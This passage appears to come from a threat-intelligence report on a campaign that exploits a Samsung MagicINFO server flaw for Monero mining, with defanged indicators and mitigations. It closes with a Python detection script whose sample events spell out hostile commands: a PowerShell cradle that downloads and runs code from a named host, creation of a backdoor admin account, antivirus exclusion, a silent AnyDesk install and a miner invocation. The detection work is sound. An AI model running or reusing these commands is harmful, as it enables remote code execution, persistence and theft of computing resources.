The use of Rust suggests technical sophistication, aiming for memory safety and potentially complicating automated analysis/reverse engineering efforts. Focus on credential and crypto theft points to direct financial motives.
## Mitigations
Block known malicious domains/IPs. Implement browser/credential monitoring solutions. Sandbox or restrict execution of PowerShell scripts initiated by untrusted sources (e.g., JavaScript interactions), and train users that no legitimate CAPTCHA asks them to run a command or script.
***
# Threat Actor: Unspecified Actor exploiting Samsung MagicINFO 9 Server (CVE-2025-4632) for cryptomining (associated with `smi2.exe`)
## Attribution & Identity
No specific threat actor name is provided. The activity is the exploitation of CVE-2025-4632 in Samsung MagicINFO 9 Server to run XMRig under the name `smi2.exe`. The tooling (PowerShell and batch scripts, `tomcat9.exe`, `%TEMP%` paths, AnyDesk) shows the compromised hosts are Windows servers; the ELF binaries in this week's report belong to the Mimo campaign, not to this one.
## Activity Summary
Observed gaining remote code execution and system-level file write on MagicINFO 9 Server hosts via CVE-2025-4632 (CVSS 9.8). The activity includes reconnaissance, multi-stage script execution (PowerShell and batch), scripted persistence, creation of administrative users, installation of the AnyDesk remote management tool, manipulation of antivirus settings, and deployment of Monero mining software.
## Tactics, Techniques & Procedures
- Reconnaissance commands spawned from `tomcat9.exe`, the legitimate Windows service process of the MagicINFO web server, because the exploit executes in the context of that service.
- Multi-stage execution via PowerShell and batch scripts; the `dlt` parameter of the download URLs (`pshell`, `cutil`, `curl`) appears to select the fetch method.
- Persistence set up automatically by the scripts.
- Antivirus disabling techniques (manipulation of AV settings).
- Creation of administrative user accounts for follow-on access; since the exploit already runs with system-level privileges, this is account persistence rather than privilege escalation.
- Remote Access: installation of AnyDesk.
## Targeting
- Sectors: Organizations running Samsung MagicINFO 9 Server (digital signage management), typically on Windows hosts reachable by the signage fleet.
- Geography: Not specified.
- Victims: Organizations with unpatched, Internet-exposed MagicINFO 9 Server instances; no specific victims are named.
## Tools & Infrastructure
- Malware families used: XMRig cryptocurrency miner (disguised as `smi2.exe`), AnyDesk tool.
- Infrastructure (C2, domains, IPs):
- IPs: 157[.]230[.]106[.]100, 173[.]249[.]48[.]227, 185[.]213[.]26[.]27
- Domain: crmmr[.]icc[.]me
- URLs: multiple payload-delivery URLs on the same `/mobile/winapp.php` endpoint, differing in the `dlt` parameter (`pshell`, `cutil`, `curl`) and in `app`/`port` (HTTP on the IP, HTTPS on the domain), e.g. http://157[.]230[.]106[.]100/mobile/winapp[.]php?app=SMIW&port=80&xbf=smi2[.]exe&ar=1&dbg=1&sdir=RND&rdir=%TEMP%&dlt=pshell
## Implications
The actor seeks long-term access (using AnyDesk and persistence mechanisms) to leverage victim resources solely for financial gain via Monero mining, posing operational risk and significant resource drain.
## Mitigations
Patch Samsung MagicINFO 9 Server against CVE-2025-4632 and keep the management interface off the Internet. Host-based monitoring for `tomcat9.exe` spawning `cmd.exe` or `powershell.exe`, for script execution, unauthorized local administrator creation, unattended AnyDesk installation and changes to antivirus configuration. Egress filtering that blocks the listed IPs and `crmmr[.]icc[.]me` and denies outbound connections from unknown processes, plus alerting on sustained CPU use by unrecognised binaries such as `smi2.exe`.
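The process chain above (MagicINFO's `tomcat9.exe` spawning a shell, `net user ... /add`, antivirus tampering, an unattended AnyDesk install, then `smi2.exe` mining) and the EDDIESTEALER cradle described earlier (a user-launched PowerShell command that downloads and runs the stealer) can be caught with the same process-creation telemetry. This added example (ours, not code from eSentire, Elastic or RST Cloud) applies those rules to constructed Sysmon-style events. The command lines, file paths, password and AnyDesk installer flags are assumptions built from the summaries; the `llll.fit` and `crmmr.icc.me` hosts and the `smi2.exe` name come from the IoC lists.

```python
import os
import re

WEB_SERVER_PARENTS = {"tomcat9.exe", "tomcat8.exe", "tomcat10.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
          "certutil.exe", "bitsadmin.exe", "curl.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
MINER_NAMES = {"smi2.exe", "xmrig.exe"}   # smi2.exe is the masquerade name from the report

ADMIN_RE = re.compile(r"\bnet1?(?:\.exe)?\s+(?:user\b.*\s/add\b|localgroup\s+administrators\b.*\s/add\b)"
                      r"|\bNew-LocalUser\b|\bAdd-LocalGroupMember\b", re.I)
AV_TAMPER_RE = re.compile(r"\bSet-MpPreference\b.*-Disable\w*|\bAdd-MpPreference\b.*-Exclusion\w*"
                          r"|\bsc(?:\.exe)?\s+(?:stop|config|delete)\s+WinDefend\b|DisableAntiSpyware", re.I)
ANYDESK_INSTALL_RE = re.compile(r"--(?:install|silent|start-with-win)\b", re.I)
DOWNLOAD_RE = re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile"
                         r"|Net\.WebClient|Start-BitsTransfer)\b", re.I)
EXEC_RE = re.compile(r"\biex\b|\bInvoke-Expression\b|-w(?:indowstyle)?\s+hidden\b", re.I)
MINER_RE = re.compile(r"stratum\+(?:tcp|ssl)://|--donate-level\b|--coin\s+monero\b|\bxmrig\b", re.I)

def _base(path):
    """Lower-case file name from a Windows or POSIX path."""
    return os.path.basename(path.replace("\\", "/")).lower()

def detect(ev):
    """Return the rule names that fire for one process-creation event."""
    parent, image, cmd = _base(ev["parent"]), _base(ev["image"]), ev["cmdline"]
    hits = []
    if parent in WEB_SERVER_PARENTS and image in SHELLS:
        hits.append("web-server-spawned-shell")          # exploited service running commands
    if ADMIN_RE.search(cmd):
        hits.append("local-admin-account-created")       # account persistence
    if AV_TAMPER_RE.search(cmd):
        hits.append("antivirus-tampering")
    if image == "anydesk.exe" and ANYDESK_INSTALL_RE.search(cmd):
        hits.append("anydesk-unattended-install")        # remote access left behind
    if image in POWERSHELL and DOWNLOAD_RE.search(cmd) and EXEC_RE.search(cmd):
        hits.append("powershell-download-cradle")        # fake-CAPTCHA style stager
    if image in MINER_NAMES or MINER_RE.search(cmd):
        hits.append("xmrig-miner-activity")
    return hits

def run(events):
    """(index, rules) for every event that fires at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            out.append((i, hits))
    return out

# Constructed Sysmon EventID 1 style events (parent image, image, command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Tomcat9\bin\tomcat9.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami & systeminfo"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user svc_update P@ssw0rd! /add"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ep bypass -c "Add-MpPreference -ExclusionPath C:\Windows\Temp"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\Temp\AnyDesk.exe",
     "cmdline": r'C:\Windows\Temp\AnyDesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "iex (irm https://llll.fit/)"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\Temp\smi2.exe",
     "cmdline": r"C:\Windows\Temp\smi2.exe -o stratum+tcp://crmmr.icc.me:443 --donate-level 1"},
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Tomcat9\bin\tomcat9.exe",
     "cmdline": "tomcat9.exe //RS//Tomcat9"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for i, rules in run(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], "->", ", ".join(rules))
```

The parent-process rule is the high-fidelity one for this intrusion: a Tomcat service has no reason to launch `cmd.exe`, so a single hit there is worth an alert on its own, while the command-line rules are better treated as a sequence (account creation followed by AV exclusions followed by a remote-access install within minutes on one host).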